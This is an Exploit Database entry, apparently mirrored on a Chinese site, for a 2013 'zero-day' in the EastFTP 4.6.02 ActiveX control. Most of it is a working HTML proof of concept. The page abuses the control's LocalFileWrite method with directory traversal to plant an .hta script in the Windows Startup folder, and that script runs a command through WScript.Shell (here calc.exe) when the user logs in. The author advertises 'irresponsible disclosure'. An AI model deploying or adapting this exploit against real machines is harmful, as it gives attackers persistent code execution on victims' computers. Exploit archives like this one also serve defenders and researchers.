EastFTP 4.6.02 – ActiveX Control

• Exploit Database
• 44 阅读

• 作者： Dr_IDE
  日期： 2013-03-20
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/24863/

• #################################################################
  #
  # EastFTP ActiveX Control 0Day
  # By: Dr_IDE
  # Vendor Homepage:http://www.ftpocx.com/download.htm
  # Version: 4.6.02
  #
  # Self Promotion: http://irresponsibledisclosure.blogspot.com
  #################################################################
  
  <html>
  <object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target'/></object>
  <script>
  var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta";
  var king = "><" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
  var easy = 1;
  target.LocalFileWrite(sofa,king,easy);
  </script>
  <body>
  EaseFTP ActiveX Control 0-Day Local Exploit<br>
  By: Dr_IDE<br>
  Self Promotion: http://irresponsibledisclosure.blogspot.com<br>
  Vendor Homepage:http://www.ftpocx.com/download.htm<br>
  Version: 4.6.02<br>
  Class FtpLibrary<br>
  GUID: {31AE647D-11D1-4E6A-BE2D-90157640019A}<br>
  Number of Interfaces: 1<br>
  Default Interface: _FtpLibrary<br>
  RegKey Safe for Script: False<br>
  RegkeySafe for Init: False<br>
  KillBitSet: False<br>
  </body>
  </html>